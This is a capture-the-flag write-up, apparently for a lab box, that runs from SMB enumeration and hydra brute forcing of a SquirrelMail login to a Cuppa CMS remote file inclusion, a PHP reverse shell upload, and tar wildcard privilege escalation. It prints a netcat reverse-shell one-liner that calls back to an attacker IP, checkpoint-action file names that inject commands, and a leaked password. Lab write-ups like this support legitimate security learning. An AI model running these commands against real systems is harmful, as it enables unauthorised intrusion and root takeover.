Hi guys, this is my first writeup, I hope you are comfortable with my solution.
Deploy your machine, make sure your VPN is running and LET’S GO.
#Step 1: NMAP
- sC = Default Script
- -sV = Version Scan
- -A = Aggressive Scan
- -T5 = Insane speed
- -oN = Output of text
Now I noticed, that samba is open, so the first thing I did is do a mapping. With the following command:
smbmap -H <IP>
anonymous seems to be readable, so we immediately enter “anonymous” as a user.
I was able to log in without a password, and extract an interesting “attention.txt” file with the command. get attention.txt
milesdyson so , can be a possible user. Just Enumerate more. Let’s try to re-enter anonymous, cd logs, and get all the files with the command: mget *
Open the file called “log1.txt” , it seems to be interesting and there are possible passwords inside.
Let’s enumerate again. With the following command: enum4linux -a -r <IP> I have found milesdyson is a user confirmation.
#Gobuster:
I use gobuster to brute-force directories, and luckily we found an interesting one.
/squirrelmail , we simply browse and we find ourselves a login page.
#Burp Suite:
The first thing that came to my mind to do is try to capture the request with burp suite, putting for example as user test and password test.
It occurred to me, since we have passwords in the “log1.txt” file, to bruteforce with hydra http-form-post.
hydra -l milesdyson -P log1.txt 10.10.133.233 http-form-post “/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.” -V .From the output that burpsuite gave us, and from the output, of the user and the wrong password we can, confirm this. Of course, remember to put log1.txt as a password list. And Finally PASSWORD FOUND:
ok we can enter the site, and we find “Samba Password reset” and gives us:
Password: )s{A&2Z=F^n_E.B`
Ok now, we can access the samba user “milesdyson”:
smbclient //IP/milesdyson -U “milesdyson” and as password use the one found now.
cd notes and extract all files as before with the mget * command
I have not found anything interesting but a file: “important.txt”
and finally we found the hidden directory!
Ok let’s browse this directory.
But we find nothing interesting, so let’s try to enumerate this directory again using gobuster.
#Gobuster (Again):
gobuster dir -u http://IP/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 64
And finally we found a good directory.
At this point, I have tried various techniques to Bypass login, but nothing seems to work. So I just googled “CMS Cuppa exploit” and i found a RFI exploit.
Then I just followed, what the exploit gave me, and finally …
Now I can finally try to upload the reverse shell. You can find it by default inside your kali linux. Otherwise just download it from the following link: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php Or follow my commands:
Change only the IP , remember is the IP of VPN.
Now upload the reverse shell. Follow my commands:
python3 -m http.server 8080
nc -lnvp 1234
and now upload the shell on the browse like this:
and finally:
Now there is a problem. From here on I really hit my head, and I didn’t understand, I tried and did everything. But then in the end I just googled and found the solution.
#Vertical Privilage Escalation:
i googled : privilage escalation .tgz
and finally i found the solution , i add here the link: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
First move on directory /var/www/html and now follow my commands:
Step1: echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.158.245 7777 >/tmp/f” > rev.sh
Step2: echo “” > “ — checkpoint-action=exec=sh rev.sh”
Step3: echo “” > — checkpoint=1
Listen in your shell on port 7777 with the command:
nc -lnvp 7777
Wait a few minutes and finally!! WE ARE ROOT.
Thanks to everyone for following the writeup I hope we have been useful. Good luck guys.